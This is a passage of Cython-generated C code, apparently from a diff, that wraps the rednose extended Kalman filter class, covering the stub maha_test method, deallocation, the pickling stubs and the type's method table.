__Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.rts_smooth", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":186 + * raise NotImplementedError() # TODO + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test = {"maha_test", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v_x = 0; + CYTHON_UNUSED PyObject *__pyx_v_P = 0; + CYTHON_UNUSED PyObject *__pyx_v_kind = 0; + CYTHON_UNUSED PyObject *__pyx_v_z = 0; + CYTHON_UNUSED PyObject *__pyx_v_R = 0; + CYTHON_UNUSED PyObject *__pyx_v_extra_args = 0; + CYTHON_UNUSED PyObject *__pyx_v_maha_thresh = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("maha_test (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_x,&__pyx_n_s_P,&__pyx_n_s_kind,&__pyx_n_s_z,&__pyx_n_s_R,&__pyx_n_s_extra_args,&__pyx_n_s_maha_thresh,0}; + PyObject* values[7] = {0,0,0,0,0,0,0}; + values[5] = __pyx_k__33; + values[6] = ((PyObject *)__pyx_float_0_95); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 7: values[6] = __Pyx_Arg_FASTCALL(__pyx_args, 6); + CYTHON_FALLTHROUGH; + case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_x)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_P)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("maha_test", 0, 5, 7, 1); __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_kind)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("maha_test", 0, 5, 7, 2); __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_z)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("maha_test", 0, 5, 7, 3); __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_R)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("maha_test", 0, 5, 7, 4); __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 5: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_extra_args); + if (value) { values[5] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 6: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_maha_thresh); + if (value) { values[6] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "maha_test") < 0)) __PYX_ERR(0, 186, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 7: values[6] = __Pyx_Arg_FASTCALL(__pyx_args, 6); + CYTHON_FALLTHROUGH; + case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_x = values[0]; + __pyx_v_P = values[1]; + __pyx_v_kind = values[2]; + __pyx_v_z = values[3]; + __pyx_v_R = values[4]; + __pyx_v_extra_args = values[5]; + __pyx_v_maha_thresh = values[6]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("maha_test", 0, 5, 7, __pyx_nargs); __PYX_ERR(0, 186, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.maha_test", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_26maha_test(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_x, __pyx_v_P, __pyx_v_kind, __pyx_v_z, __pyx_v_R, __pyx_v_extra_args, __pyx_v_maha_thresh); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_26maha_test(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_x, CYTHON_UNUSED PyObject *__pyx_v_P, CYTHON_UNUSED PyObject *__pyx_v_kind, CYTHON_UNUSED PyObject *__pyx_v_z, CYTHON_UNUSED PyObject *__pyx_v_R, CYTHON_UNUSED PyObject *__pyx_v_extra_args, CYTHON_UNUSED PyObject *__pyx_v_maha_thresh) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__34) + __Pyx_RefNannySetupContext("maha_test", 0); + __Pyx_TraceCall("maha_test", __pyx_f[0], 186, 0, __PYX_ERR(0, 186, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":187 + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): + * raise NotImplementedError() # TODO # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(__pyx_builtin_NotImplementedError); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 187, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 187, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":186 + * raise NotImplementedError() # TODO + * + * def maha_test(self, x, P, kind, z, R, extra_args=[], maha_thresh=0.95): # <<<<<<<<<<<<<< + * raise NotImplementedError() # TODO + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.maha_test", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":189 + * raise NotImplementedError() # TODO + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.ekf + */ + +/* Python wrapper */ +static void __pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_29__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_29__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_28__dealloc__(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_28__dealloc__(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__dealloc__", 0); + __Pyx_TraceCall("__dealloc__", __pyx_f[0], 189, 0, __PYX_ERR(0, 189, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":190 + * + * def __dealloc__(self): + * del self.ekf # <<<<<<<<<<<<<< + */ + delete __pyx_v_self->ekf; + + /* "rednose/helpers/ekf_sym_pyx.pyx":189 + * raise NotImplementedError() # TODO + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.ekf + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_WriteUnraisable("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__dealloc__", __pyx_clineno, __pyx_lineno, __pyx_filename, 1, 0); + __pyx_L0:; + __Pyx_TraceReturn(Py_None, 0); + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_30__reduce_cython__(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_30__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__35) + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + __Pyx_TraceCall("__reduce_cython__", __pyx_f[1], 1, 0, __PYX_ERR(1, 1, __pyx_L1_error)); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_32__setstate_cython__(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_32__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__36) + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + __Pyx_TraceCall("__setstate_cython__", __pyx_f[1], 3, 0, __PYX_ERR(1, 3, __pyx_L1_error)); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx(PyTypeObject *t, PyObject *a, PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + if (unlikely(__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_29__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx[] = { + {"init_state", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"state", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"covs", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"set_filter_time", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_filter_time", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"set_global", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"reset_rewind", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"predict", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"predict_and_update_batch", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"augment", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_21augment, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_augment_times", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_23get_augment_times, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"rts_smooth", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_25rts_smooth, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"maha_test", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_27maha_test, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_31__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_33__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx}, + {Py_tp_methods, (void *)__pyx_methods_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx}, + {Py_tp_new, (void *)__pyx_tp_new_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx_spec = { + "rednose.helpers.ekf_sym_pyx.EKF_sym_pyx", + sizeof(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + 